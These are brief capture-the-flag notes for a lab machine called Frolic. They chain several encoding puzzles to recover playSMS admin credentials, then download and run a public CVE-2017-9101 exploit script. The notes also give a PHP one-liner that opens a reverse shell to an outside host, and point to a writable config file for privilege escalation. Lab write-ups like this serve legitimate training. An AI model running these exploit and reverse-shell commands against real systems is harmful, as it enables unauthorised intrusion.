# Frolic
IP: 10.10.10.111
# Findings
- port 9999
/backup/password.txt
login password ofimnothuman
/admin
login password ofsuperduperlooperpassword_lol
- logging in grants a ook language page, decoding gives a path:
/asdiSIAJJ0QWE9JAS
- The contents of that path look like base64 encoded
- We extract that into a text file and remove spaces
- Now use
base64 -d hash
to decode it and redirect output to a file - When running
file
on the newly decoded file, it appears as a zip - Unzipping the file with password
password
reveals another base64 like file in hex - Convert hex to base64 with
xxd
- Code is brain**** and decoding gives
idkwhatispass
- For the
/playsms
directory, the usernameadmin
/idkwhatispass
works
wget https://github.com/jasperla/CVE-2017-9101/raw/master/playsmshell.py
python3 playsmshell.py --username admin --password idkwhatispass --url http://10.10.10.111:9999/playsms --interactive
Get a better shell back with:
php -r '$sock=fsockopen("10.10.14.21",443);exec("/bin/sh -i <&3 >&3 2>&3");'
# Priv esc
/var/www/html/playsms/plugin/themes/ubuntu/config.php
writable, used by playsms